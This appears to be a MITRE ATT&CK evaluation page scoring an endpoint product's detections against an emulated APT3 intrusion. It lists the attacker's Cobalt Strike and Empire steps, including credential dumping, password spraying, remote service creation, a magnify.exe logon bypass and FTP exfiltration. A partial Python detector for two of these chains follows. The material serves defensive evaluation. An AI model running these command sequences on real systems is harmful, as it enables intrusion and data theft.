Empire: Successful authentication targeted Windows admin shares on Conficker (10.0.0.5)
Windows Admin Shares
(T1077)
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally to access resources on the network.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments to the C$ share on 10.0.0.4 (Creeper) as the user Kmitnick. The telemetry was tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8]
Empire: 'net use' via PowerShell to successfully authenticate to Creeper (10.0.0.4) using credentials of user Kmitnick
Valid Accounts
(T1078)
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments to the C$ share on Creeper as the user Kmitnick. The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4]
16.E.1
Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)
Remote File Copy
(T1105)
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because a .vbs was written to the filesystem, which was likely used to carry out additional actions.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry (Tainted)
Telemetry showed File Write and New Script Write events for autoupdate.vbs under powershell.exe. The telemetry was tainted by a previous detection. [1] [2] [3] [4] [5] [6] [7] [8]
16.F.1
Empire: Built-in runas module executed to launch malicious VBScript (autoupdate.vbs) as user Kmitnick
Command-Line Interface
(T1059)
Telemetry (Tainted)
Telemetry showed a new cmd.exe process running wscript.exe as user Kmitnick, which then launched powershell.exe. The command line arguments for cmd.exe showed that autoupdate.vbs was run. The telemetry was tainted by a previous detection. [1] [2]
16.G.1
Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)
Remote File Copy
(T1105)
Telemetry
Telemetry showed update.vbs written to the C$ remote share on host 10.0.0.4 (Creeper). [1] [2] [3] [4] [5] [6] [7] [8]
16.H.1
Empire: 'sc query' via PowerShell to remotely enumerate services on Creeper (10.0.0.4)
System Service Discovery
(T1007)
Telemetry (Tainted)
Telemetry showed execution of sc.exe to query services on Creeper. The process tree view showed sc.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because the user Bob was querying for a particular service on Creeper.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
16.I.1
Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)
New Service
(T1050)
General Behavior (Delayed)
The OverWatch team sent an email indicating they observed a General Behavior because a newly created file (the AdobeUpdater service in the registry) established persistence on the host.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3]
Telemetry (Tainted)
Telemetry showed sc.exe executing with command-line arguments for a new service called AdobeUpdater with binPath pointed to cmd.exe with arguments to execute update.vbs and service description "Synchronize with Adobe for security updates." The process tree view showed sc.exe as tainted by a previous powershell.exe detection. [1] [2] [3]
Empire: 'sc description' via PowerShell to remotely disguise a service on Creeper (10.0.0.4)
Masquerading
(T1036)
Telemetry (Tainted)
Telemetry showed sc.exe executing with command-line arguments for a new service called AdobeUpdater with binPath pointed to cmd.exe with arguments to execute update.vbs and service description "Synchronize with Adobe for security updates." An analyst could use this information to determine it is not a legitimate service. The process tree view showed sc.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6]
16.J.1
Empire: 'sc qc' via PowerShell to remotely enumerate a specific service on Creeper (10.0.0.4)
System Service Discovery
(T1007)
Specific Behavior (Delayed)
The OverWatch team sent an email indicating they observed a Specific Behavior because the user Bob queried for a particular service on Creeper.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry (Tainted)
Telemetry showed sc.exe executing with command-line arguments to query the AdobeUpdater service on Creeper. The process tree view showed sc.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
16.K.1
Empire: 'type' via PowerShell to remotely enumerate a specific file (update.vbs) on Creeper (10.0.0.4)
File and Directory Discovery
(T1083)
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
16.L.1
Empire: 'sc start' via PowerShell to remotely launch a specific service on Creeper (10.0.0.4)
Service Execution
(T1035)
Specific Behavior (Delayed)
The OverWatch team sent an email indicating they observed a Specific Behavior because update.vbs executed following the start of the AdobeUpdater service.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2]
Telemetry (Tainted)
Telemetry showed sc.exe executing with command-line arguments to start the AdobeUpdater service on Creeper. The process tree view showed sc.exe as tainted by a previous powershell.exe detection. [1] [2]
17.A.1
Empire: 'reg query' via PowerShell to enumerate a specific Registry key associated with terminal services
System Service Discovery
(T1007)
Telemetry (Tainted)
Telemetry showed reg.exe executing with command-line arguments to check if terminal services are enabled. The process tree view showed reg.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Empire: 'reg query' via PowerShell to enumerate a specific Registry key
Query Registry
(T1012)
Telemetry (Tainted)
Telemetry showed reg.exe executing with command-line arguments. The process tree view showed reg.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
17.B.1
Empire: 'takeown' via PowerShell to obtain ownership of magnify.exe
File and Directory Permissions Modification
(T1222)
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because takeown.exe was executed to bypass Windows logon.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry showed takeown.exe executing with command-line arguments. The process tree view showed takeown.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4]
17.B.2
Empire: 'icacls' via PowerShell to modify the DACL for magnify.exe
File and Directory Permissions Modification
(T1222)
Telemetry (Tainted)
Telemetry showed execution of icacls.exe with command-line arguments. The process tree view showed icacls.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because icacls.exe was executed to bypass Windows logon.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4]
17.C.1
Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe
Accessibility Features
(T1015)
Telemetry (Tainted)
Telemetry showed a file write of magnify.exe by powershell.exe in the system directory. The telemetry was tainted by an alert on its parent powershell.exe process. [1] [2] [3] [4] [5]
18.A.1
Empire: 'Get-ChildItem' via PowerShell to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
File and Directory Discovery
(T1083)
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
18.B.1
Empire: 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)
Data Staged
(T1074)
Telemetry
Telemetry showed the .vsdx file being written into the Recycle Bin. [1] [2]
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because the .vsdx file was copied to the Recycle Bin, a "likely location to stage files of interest."[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2]
Empire: 'copy' via PowerShell collected a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
Data from Network Shared Drive
(T1039)
None
No detection capability demonstrated for this procedure, though telemetry was available for the file write of the .vsdx into the Recycle Bin (no data was available that indicated it came from a network shared drive).
19.A.1
Empire: File dropped to disk is a renamed copy of the WinRAR binary
Masquerading
(T1036)
Telemetry
Telemetry showed the SHA256 hash value of recycler.exe when it was written to disk, which an analyst could use to determine recycler.exe was actually WinRAR. [1] [2] [3] [4] [5] [6]
Empire: Built-in upload module executed to write binary (recycler.exe) to disk on CodeRed (10.0.1.5)
Remote File Copy
(T1105)
Telemetry (Tainted)
Telemetry showed file write of recycler.exe by powershell.exe as well as the network connection over which the download occurred. The process tree view showed the parent powershell.exe process as tainted by a previous wscript.exe detection. [1] [2] [3] [4] [5] [6] [7] [8]
19.B.1
Empire: Executed binary (recycler.exe) created compressed archive (old.rar) of previously collected file
Data Compressed
(T1002)
Telemetry
Telemetry within the alert showed the command-line details for the execution of recycler.exe, and would also be available in a separate view.[CS2] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3]
Specific Behavior (Tainted)
A Specific Behavior alert was generated for a RAR archive "written by a process with suspicious command line arguments." The alert showed the command-line details and was tagged with the correct ATT&CK Technique (Data Compressed) and Tactic (Exfiltration). The process tree view showed the recycler.exe alert as tainted by a previous powershell.exe detection. [1] [2] [3]
Specific Behavior (Delayed)
The OverWatch team sent an email indicating they observed a Specific Behavior because a .vsdx file was archived for likely exfiltration using the renamed RAR binary, recycler.exe.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3]
Empire: Executed binary (recycler.exe) created encrypted archive (old.rar) of previously collected file
Data Encrypted
(T1022)
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because a .vsdx file was archived for likely exfiltration using the renamed WinRAR binary, recycler.exe.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2]
Specific Behavior (Tainted)
A Specific Behavior alert was created for a RAR archive "written by a process with suspicious command line arguments." Details showed the flags -hp within the command line that indicated use of encryption, and the alert was mapped to a related ATT&CK Technique (Data Compressed) and the correct Tactic (Exfiltration). The process tree view showed the recycler.exe alert as tainted by a previous powershell.exe detection. [1] [2]
Telemetry
Telemetry within the alert showed the command-line details for the execution of recycler.exe, and would also be available in a separate view.[CS2] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2]
Empire: Executed binary (recycler.exe) is a renamed copy of the WinRAR binary
Masquerading
(T1036)
Telemetry
Telemetry within the alert showed the command-line details for the execution of recycler.exe, and would also be available in a separate view.[CS2] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6]
Specific Behavior (Tainted)
A Specific Behavior alert was created for a RAR archive "written by a process with suspicious command line arguments." Details showed that recycler.exe wrote a RAR archive and that recycler.exe was signed by win.rar GmbH. The process tree view showed the recycler.exe alert as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6]
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because a .vsdx file was archived for likely exfiltration using the renamed WinRAR binary, recycler.exe.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6]
19.C.1
Empire: Sequence of 'echo' commands via PowerShell to populate commands in a text file (ftp.txt), which is then executed by FTP to exfil data through a network connection separate from the existing C2 channel
Exfiltration Over Alternative Protocol
(T1048)
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because collected files were exfiltrated via FTP.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2]
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating ftp.exe executing with ftp.txt was suspicious. The process tree view showed ftp.exe as tainted by a previous powershell.exe detection.[CS1] OverWatch is the managed threat hunting service. [1] [2]
Telemetry
Telemetry within the OverWatch alert showed ftp.exe executing with ftp.txt.[CS2] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2]
19.D.1
Empire: 'del C:\"$"Recycle.bin\old.rar'
File Deletion
(T1107)
Telemetry
Telemetry showed the deletion of old.rar with an event name of FileDeleted. [1] [2] [3] [4]
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because files (including old.rar) were deleted from the host CodeRed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4]
19.D.2
Empire: 'del recycler.exe'
File Deletion
(T1107)
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because files (including recycler.exe) were deleted from the host CodeRed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4]
Telemetry
Telemetry showed the deletion of recycler.exe with an event name of ExecutableDeleted. [1] [2] [3] [4]
20.A.1
magnify.exe previously overwritten by cmd.exe launched through RDP connection made to Creeper (10.0.0.4)
Accessibility Features
(T1015)
Telemetry
Telemetry within the alert showed the details for magnify.exe, and would also be available in a separate view.[CS2] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5]
Specific Behavior
A Specific Behavior alert was generated on utilman.exe executing magnify.exe, noting that "a process chain bypassed Windows logon security." The alert was marked critical and was mapped to the correct ATT&CK Technique (Accessibility Features) and Tactic (Persistence). Data in the alert also showed that magnify.exe was identified as cmd.exe based on hash value in the common name field. [1] [2] [3] [4] [5]
General Behavior (Delayed)
OverWatch generated a General Behavior alert indicating a Windows logon bypass on Creeper was observed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5]
RDP connection made to Creeper (10.0.0.4) as part of execution of persistence mechanism
Remote Desktop Protocol
(T1076)
Telemetry
Telemetry showed a logon type 10 (remote interactive logon) for Kmitnick on Creeper, indicating an RDP session was established and logged into. [1] [2] [3] [4] [5] [6] [7]
20.B.1
Executed 'whoami' via cmd persistence mechanism through RDP connection made to Creeper (10.0.0.4)
System Owner/User Discovery
(T1033)
Telemetry (Tainted)
Telemetry showed execution of whoami.exe. The process tree view showed whoami.exe was tainted by a previous magnify.exe detection. [1] [2] [3] [4] [5] [6]

Operational Flow

The Operational Flow panel provides the context around when a procedure was executed by showing all steps of the evaluation, including the tactics, techniques and procedures of the executed steps.

Step 1: Initial Compromise

1.A.1 Execution

User Execution

i. Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)

1.A.1 Execution

Rundll32

i. Previously executed batch file (pdfhelper.cmd) launched a DLL payload (update.dat) using Rundll32

1.A.1 Execution

Scripting

i. Previously executed self-extracting archive (Resume Viewer.exe) launched an embedded batch file (pdfhelper.cmd)

1.B.1 Persistence

Registry Run Keys / Startup Folder

i. Previously executed batch file (pdfhelper.cmd) moved a separate batch file (autoupdate.bat) to the Startup folder

1.C.1 Command and Control

Commonly Used Port

i. Cobalt Strike: C2 channel established using port 53

1.C.1 Command and Control

Standard Application Layer Protocol

i. Cobalt Strike: C2 channel established using DNS traffic to freegoogleadsenseinfo.com

1.C.1 Command and Control

Data Encoding

i. Cobalt Strike: C2 channel established using both NetBIOS and base64 encoding

Step 2: Initial Discovery

2.A.1 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'ipconfig -all' via cmd

2.A.2 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'arp -a' via cmd

2.B.1 Discovery

System Owner/User Discovery

i. Cobalt Strike: 'echo' via cmd to enumerate specific environment variables

2.C.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

2.C.2 Discovery

Process Discovery

i. Cobalt Strike: 'tasklist -v' via cmd

2.D.1 Discovery

System Service Discovery

i. Cobalt Strike: 'sc query' via cmd

2.D.2 Discovery

System Service Discovery

i. Cobalt Strike: 'net start' via cmd

2.E.1 Discovery

System Information Discovery

i. Cobalt Strike: 'systeminfo' via cmd

2.E.2 Discovery

System Information Discovery

i. Cobalt Strike: 'net config workstation' via cmd

2.F.1 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net localgroup administrators' via cmd

2.F.2 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net localgroup administrators -domain' via cmd

2.F.3 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net group "Domain Admins" -domain' via cmd

2.G.1 Discovery

Account Discovery

i. Cobalt Strike: 'net user -domain' via cmd

2.G.2 Discovery

Account Discovery

i. Cobalt Strike: 'net user george -domain' via cmd

2.H.1 Discovery

Query Registry

i. Cobalt Strike: 'reg query' via cmd to enumerate a specific Registry key

Step 3: Privilege Escalation

3.A.1 Privilege Escalation

Bypass User Account Control

i. Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level

3.A.1 Privilege Escalation

Access Token Manipulation

i. Cobalt Strike: Built-in UAC bypass token duplication capability executed to modify current process token

3.B.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

3.C.1 Privilege Escalation

Process Injection

i. Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe

Step 4: Discovery for Lateral Movement

4.A.1 Discovery

Remote System Discovery

i. Cobalt Strike: 'net group "Domain Controllers" -domain' via cmd

4.A.2 Discovery

Remote System Discovery

i. Cobalt Strike: 'net group "Domain Computers" -domain' via cmd

4.B.1 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'netsh advfirewall show allprofiles' via cmd

4.C.1 Discovery

System Network Connections Discovery

i. Cobalt Strike: 'netstat -ano' via cmd

Step 5: Credential Access

5.A.1 Credential Access

Credential Dumping

i. Cobalt Strike: Built-in Mimikatz credential dump capability executed

5.A.1 Credential Access

Process Injection

i. Cobalt Strike: Credential dump capability involved process injection into lsass

5.A.2 Credential Access

Credential Dumping

i. Cobalt Strike: Built-in hash dump capability executed

5.A.2 Credential Access

Process Injection

i. Cobalt Strike: Hash dump capability involved process injection into lsass.exe

5.B.1 Privilege Escalation

Access Token Manipulation

i. Cobalt Strike: Built-in token theft capability executed to change user context to George

Step 6: Lateral Movement

6.A.1 Discovery

Query Registry

i. Cobalt Strike: 'reg query' via cmd to remotely enumerate a specific Registry key on Conficker (10.0.0.5)

6.B.1 Command and Control

Commonly Used Port

i. Cobalt Strike: C2 channel modified to use port 80

6.B.1 Command and Control

Standard Application Layer Protocol

i. Cobalt Strike: C2 channel modified to use HTTP traffic to freegoogleadsenseinfo.com

6.B.1 Command and Control

Multiband Communication

i. Cobalt Strike: C2 channel modified to split communications between both HTTP and DNS

6.C.1 Lateral Movement

Remote Desktop Protocol

i. Cobalt Strike: C2 channel modified to proxy RDP connection to Conficker (10.0.0.5)

Step 7: Persistence

7.A.1 Persistence

Create Account

i. Added user Jesse to Conficker (10.0.0.5) through RDP connection

7.A.1 Persistence

Graphical User Interface

i. Microsoft Management Console (Local Users and Groups snap-in) GUI utility used to add new user through RDP connection

7.A.1 Persistence

Account Discovery

i. Microsoft Management Console (Local Users and Groups snap-in) GUI utility displayed user account information

7.B.1 Command and Control

Remote File Copy

i. Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)

7.C.1 Persistence

Scheduled Task

i. Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)

Step 8: Collection

8.A.1 Discovery

File and Directory Discovery

i. Cobalt Strike: 'dir -s -b "\\conficker\wormshare"' via cmd

8.A.2 Discovery

File and Directory Discovery

i. Cobalt Strike: 'tree "C:\Users\debbie"' via cmd

8.B.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

8.C.1 Collection

Input Capture

i. Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie

8.C.1 Collection

Application Window Discovery

i. Cobalt Strike: Keylogging capability included residual enumeration of application windows

8.D.1 Collection

Screen Capture

i. Cobalt Strike: Built-in screen capture capability executed to capture screenshot of current window of user Debbie

8.D.1 Collection

Process Injection

i. Cobalt Strike: Screen capture capability involved process injection into explorer.exe

Step 9: Exfiltration

9.A.1 Discovery

File and Directory Discovery

i. Cobalt Strike: 'ls' (List) via Win32 APIs to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)

9.B.1 Exfiltration

Data from Network Shared Drive

i. Cobalt Strike: Built-in download capability executed to collect a file (Shockwave_rackb_diagram.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

9.B.1 Exfiltration

Exfiltration Over Command and Control Channel

i. Cobalt Strike: Download capability exfiltrated data through existing C2 channel

Step 10: Execution of Persistence

10.A.1 Persistence

Registry Run Keys / Startup Folder

i. Batch file (autoupdate.bat) previously written to Startup folder executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (update.dat) using Rundll32

10.A.2 Persistence

Scheduled Task

i. Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32

10.B.1 Persistence

Valid Accounts

i. RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse

10.B.1 Persistence

Remote Desktop Protocol

i. RDP connection made to Conficker (10.0.0.5) as part of execution of persistence mechanism

Step 11: Initial Access

11.A.1 Execution

Scripting

i. Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)

11.B.1 Command and Control

Commonly Used Port

i. Empire: C2 channel established using port 443

11.B.1 Command and Control

Standard Application Layer Protocol

i. Empire: C2 channel established using HTTPS traffic to freegoogleadsenseinfo.com

11.B.1 Command and Control

Standard Cryptographic Protocol

i. Empire: Encrypted C2 channel established using HTTPS

Step 12: Initial Discovery

12.A.1 Discovery

System Network Configuration Discovery

i. Empire: 'route print' via PowerShell

12.A.2 Discovery

System Network Configuration Discovery

i. Empire: 'ipconfig -all' via PowerShell

12.B.1 Discovery

System Owner/User Discovery

i. Empire: 'whoami -all -fo list' via PowerShell

12.C.1 Discovery

Process Discovery

i. Empire: 'qprocess *' via PowerShell

12.D.1 Discovery

System Service Discovery

i. Empire: 'net start' via PowerShell

12.E.1 Discovery

Scripting

i. Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques

12.E.1.1 Discovery

System Owner/User Discovery

i. Empire: WinEnum module included enumeration of user information

12.E.1.2 Discovery

Permission Groups Discovery

i. Empire: WinEnum module included enumeration of AD group memberships

12.E.1.3 Discovery

Password Policy Discovery

i. Empire: WinEnum module included enumeration of password policy information

12.E.1.4.1 Discovery

File and Directory Discovery

i. Empire: WinEnum module included enumeration of recently opened files

12.E.1.4.2 Discovery

File and Directory Discovery

i. Empire: WinEnum module included enumeration of interesting files

12.E.1.5 Discovery

Clipboard Data

i. Empire: WinEnum module included enumeration of clipboard contents

12.E.1.6.1 Discovery

System Information Discovery

i. Empire: WinEnum module included enumeration of system information

12.E.1.6.2 Discovery

System Information Discovery

i. Empire: WinEnum module included enumeration of Windows update information

12.E.1.7 Discovery

Query Registry

i. Empire: WinEnum module included enumeration of system information via a Registry query

12.E.1.8 Discovery

System Service Discovery

i. Empire: WinEnum module included enumeration of services

12.E.1.9.1 Discovery

Network Share Discovery

i. Empire: WinEnum module included enumeration of available shares

12.E.1.9.2 Discovery

Network Share Discovery

i. Empire: WinEnum module included enumeration of mapped network drives

12.E.1.10.1 Discovery

Security Software Discovery

i. Empire: WinEnum module included enumeration of AV solutions

12.E.1.10.2 Discovery

Security Software Discovery

i. Empire: WinEnum module included enumeration of firewall rules

12.E.1.11 Discovery

System Network Configuration Discovery

i. Empire: WinEnum module included enumeration of network adapters

12.E.1.12 Discovery

System Network Connections Discovery

i. Empire: WinEnum module included enumeration of established network connections

12.F.1 Discovery

Permission Groups Discovery

i. Empire: 'net group "Domain Admins" -domain' via PowerShell

12.F.2 Discovery

Permission Groups Discovery

i. Empire: 'net localgroup administrators' via PowerShell

12.G.1 Discovery

Account Discovery

i. Empire: 'net user' via PowerShell

12.G.2 Discovery

Account Discovery

i. Empire: 'net user -domain' via PowerShell

Step 13: Discovery for Lateral Movement

13.A.1 Discovery

Remote System Discovery

i. Empire: 'net group "Domain Computers" -domain' via PowerShell

13.B.1 Discovery

System Network Connections Discovery

i. Empire: 'net use' via PowerShell

13.B.2 Discovery

System Network Connections Discovery

i. Empire: 'netstat -ano' via PowerShell

13.C.1 Discovery

Query Registry

i. Empire: 'reg query' via PowerShell to enumerate a specific Registry key

Step 14: Privilege Escalation

14.A.1 Privilege Escalation

Bypass User Account Control

i. Empire: Built-in UAC bypass token duplication module executed to launch new callback with elevated process integrity level

14.A.1 Privilege Escalation

Remote File Copy

i. Empire: UAC bypass module downloaded and wrote a new Empire stager (wdbypass) to disk

14.A.1 Privilege Escalation

Standard Application Layer Protocol

i. Empire: UAC bypass module downloaded a new Empire stager (wdbypass) over HTTP

14.A.1 Privilege Escalation

Commonly Used Port

i. Empire: UAC bypass module downloaded a new Empire stager (wdbypass) over port 8080

Step 15: Credential Access

15.A.1 Credential Access

Input Capture

i. Empire: Built-in keylogging module executed to capture keystrokes of user Bob

15.A.1 Credential Access

Application Window Discovery

i. Empire: Built-in keylogging module included residual enumeration of application windows

15.B.1 Credential Access

Credentials in Files

i. Empire: 'get-content' via PowerShell to collect sensitive file (it_tasks.txt) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Step 16: Lateral Movement

16.A.1 Credential Access

Brute Force

i. Empire: 'net use' via PowerShell to make brute force (password spraying) authentication attempts to Morris (10.0.1.4) and Nimda (10.0.1.6) targeting credentials of users Kmitnick, Bob, and Frieda

16.A.1 Credential Access

Windows Admin Shares

i. Empire: Brute force password spraying attempts targeted Windows admin shares on Morris (10.0.1.4) and Nimda (10.0.1.6)

16.B.1 Lateral Movement

Valid Accounts

i. Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick

16.B.1 Lateral Movement

Windows Admin Shares

i. Empire: Successful authentication targeted Windows admin share on Conficker (10.0.0.5)

16.B.1 Lateral Movement

Brute Force

i. Empire: Successful authentication to Conficker (10.0.0.5) using credentials of user Kmitnick as a result of the brute force password spraying

16.C.1 Defense Evasion

Network Share Connection Removal

i. Empire: 'net use -delete' via PowerShell

16.D.1 Lateral Movement

Windows Admin Shares

i. Empire: Successful authentication targeted Windows admin shares on Conficker (10.0.0.5)

16.D.1 Lateral Movement

Valid Accounts

i. Empire: 'net use' via PowerShell to successfully authenticate to Creeper (10.0.0.4) using credentials of user Kmitnick

16.E.1 Command and Control

Remote File Copy

i. Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)

16.F.1 Execution

Command-Line Interface

i. Empire: Built-in runas module executed to launch malicious VBScript (autoupdate.vbs) as user Kmitnick

16.G.1 Lateral Movement

Remote File Copy

i. Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)

16.H.1 Discovery

System Service Discovery

i. Empire: 'sc query' via PowerShell to remotely enumerate services on Creeper (10.0.0.4)

16.I.1 Privilege Escalation

New Service

i. Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)

16.I.1 Privilege Escalation

Masquerading

i. Empire: 'sc description' via PowerShell to remotely disguise a service on Creeper (10.0.0.4)

16.J.1 Discovery

System Service Discovery

i. Empire: 'sc qc' via PowerShell to remotely enumerate a specific service on Creeper (10.0.0.4)

16.K.1 Discovery

File and Directory Discovery

i. Empire: 'type' via PowerShell to remotely enumerate a specific file (update.vbs) on Creeper (10.0.0.4)

16.L.1 Execution

Service Execution

i. Empire: 'sc start' via PowerShell to remotely launch a specific service on Creeper (10.0.0.4)

Step 17: Persistence

17.A.1 Discovery

System Service Discovery

i. Empire: 'reg query' via PowerShell to enumerate a specific Registry key associated with terminal services

17.A.1 Discovery

Query Registry

i. Empire: 'reg query' via PowerShell to enumerate a specific Registry key

17.B.1 Persistence

File and Directory Permissions Modification

i. Empire: 'takeown' via PowerShell to obtain ownership of magnify.exe

17.B.2 Persistence

File and Directory Permissions Modification

i. Empire: 'icacls' via PowerShell to modify the DACL for magnify.exe

17.C.1 Persistence

Accessibility Features

i. Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe
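Two of the chains above are multi-stage command-line sequences that are weak signals individually and strong ones together: the remote service chain in 16.H through 16.L (sc query, sc create, sc description to disguise the service, sc qc, sc start against the same remote host) and the accessibility-feature overwrite in 17.B through 17.C (takeown, icacls, copy onto magnify.exe). The following is an added example written for this page, not code from MITRE or CrowdStrike, that correlates both chains from process-creation records keyed on the same host, user and target. The records are constructed; the service name, binPath, the host the takeown ran on and all timestamps are assumptions. One practitioner caveat: in Windows PowerShell, sc resolves to the Set-Content alias, so the invocation that reaches an endpoint sensor is sc.exe (or cmd.exe /c sc); the parser accepts both spellings.

```python
"""Stage correlation for the sc.exe service chain and the accessibility
binary overwrite chain.

Added example, not code from MITRE or CrowdStrike. Process-creation records
are constructed: the sc.exe lines mimic 16.I-16.L, the takeown/icacls/copy
lines mimic 17.B-17.C. Service name, binPath, the host the takeown ran on and
all timestamps are assumptions.
"""
import ntpath
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class ProcEvent:
    ts: datetime
    host: str
    user: str
    command_line: str


# Binaries launchable from the logon screen (ATT&CK Accessibility Features).
ACCESSIBILITY = {"sethc.exe", "utilman.exe", "osk.exe", "magnify.exe",
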